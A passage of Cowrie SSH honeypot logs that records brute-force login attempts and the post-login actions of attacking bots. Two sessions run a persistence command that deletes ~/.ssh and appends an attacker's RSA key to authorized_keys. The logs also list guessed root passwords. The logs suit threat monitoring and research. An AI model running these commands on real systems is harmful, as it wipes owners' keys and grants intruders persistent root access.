ac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:14.049181Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:14.754708Z","src_ip":"134.199.174.250","session":"dbade93d624f"}
{"eventid":"cowrie.login.success","username":"root","password":"admin_123","message":"login attempt [root/admin_123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:19:15.461749Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:19:16.147609Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:19:16.148257Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:19:16.148972Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:16.481128Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:19:17.259614Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:19:17.260339Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:19:17.612296Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:17.613202Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":57204,"dst_ip":"1.2.3.4","dst_port":22,"session":"31f42bcf173d","protocol":"ssh","message":"New connection: 139.59.14.27:57204 (1.2.3.4:22) [session: 31f42bcf173d]","sensor":"my-vps","timestamp":"2025-09-08T13:19:17.905331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:17.906207Z","src_ip":"139.59.14.27","session":"31f42bcf173d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:18.218497Z","src_ip":"139.59.14.27","session":"31f42bcf173d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:19:19.524164Z","src_ip":"139.59.14.27","session":"31f42bcf173d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:20.840464Z","src_ip":"139.59.14.27","session":"31f42bcf173d"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":57218,"dst_ip":"1.2.3.4","dst_port":22,"session":"e23bcf7bd099","protocol":"ssh","message":"New connection: 139.59.14.27:57218 (1.2.3.4:22) [session: e23bcf7bd099]","sensor":"my-vps","timestamp":"2025-09-08T13:19:21.163942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:21.166608Z","src_ip":"139.59.14.27","session":"e23bcf7bd099"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:21.487634Z","src_ip":"139.59.14.27","session":"e23bcf7bd099"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:19:24.464298Z","src_ip":"139.59.14.27","session":"e23bcf7bd099"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:24.795349Z","src_ip":"139.59.14.27","session":"e23bcf7bd099"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:24.805156Z","src_ip":"139.59.14.27","session":"db9d8e997cdc"}
{"eventid":"cowrie.session.connect","src_ip":"103.181.143.10","src_port":50044,"dst_ip":"1.2.3.4","dst_port":22,"session":"24f5e8236a1a","protocol":"ssh","message":"New connection: 103.181.143.10:50044 (1.2.3.4:22) [session: 24f5e8236a1a]","sensor":"my-vps","timestamp":"2025-09-08T13:19:30.825447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:30.826312Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:31.093309Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.login.success","username":"root","password":"12312300","message":"login attempt [root/12312300] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:19:32.199550Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:19:32.751998Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:19:32.752905Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:19:32.753852Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:33.027278Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:19:33.655458Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:19:33.656116Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:19:33.924489Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:33.925370Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.session.connect","src_ip":"103.181.143.10","src_port":50056,"dst_ip":"1.2.3.4","dst_port":22,"session":"4df5e84b0269","protocol":"ssh","message":"New connection: 103.181.143.10:50056 (1.2.3.4:22) [session: 4df5e84b0269]","sensor":"my-vps","timestamp":"2025-09-08T13:19:34.193853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:34.195707Z","src_ip":"103.181.143.10","session":"4df5e84b0269"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:34.458479Z","src_ip":"103.181.143.10","session":"4df5e84b0269"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:19:35.524361Z","src_ip":"103.181.143.10","session":"4df5e84b0269"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:36.791326Z","src_ip":"103.181.143.10","session":"4df5e84b0269"}
{"eventid":"cowrie.session.connect","src_ip":"103.181.143.10","src_port":60000,"dst_ip":"1.2.3.4","dst_port":22,"session":"96c07ce9217d","protocol":"ssh","message":"New connection: 103.181.143.10:60000 (1.2.3.4:22) [session: 96c07ce9217d]","sensor":"my-vps","timestamp":"2025-09-08T13:19:37.053118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:37.054015Z","src_ip":"103.181.143.10","session":"96c07ce9217d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:37.318599Z","src_ip":"103.181.143.10","session":"96c07ce9217d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:19:38.685357Z","src_ip":"103.181.143.10","session":"96c07ce9217d"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:38.944987Z","src_ip":"103.181.143.10","session":"24f5e8236a1a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:38.949968Z","src_ip":"103.181.143.10","session":"96c07ce9217d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38868,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f329cf584f9","protocol":"ssh","message":"New connection: 134.199.174.250:38868 (1.2.3.4:22) [session: 5f329cf584f9]","sensor":"my-vps","timestamp":"2025-09-08T13:19:41.372134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:19:41.380901Z","src_ip":"134.199.174.250","session":"5f329cf584f9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:19:41.752778Z","src_ip":"134.199.174.250","session":"5f329cf584f9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwerty123","message":"login attempt [oracle/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:19:43.117682Z","src_ip":"134.199.174.250","session":"5f329cf584f9"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:44.473152Z","src_ip":"134.199.174.250","session":"5f329cf584f9"}
{"eventid":"cowrie.session.connect","src_ip":"103.187.147.214","src_port":59294,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d4f70d7a5ef","protocol":"ssh","message":"New connection: 103.187.147.214:59294 (1.2.3.4:22) [session: 7d4f70d7a5ef]","sensor":"my-vps","timestamp":"2025-09-08T13:19:46.133211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:46.134067Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:46.384248Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
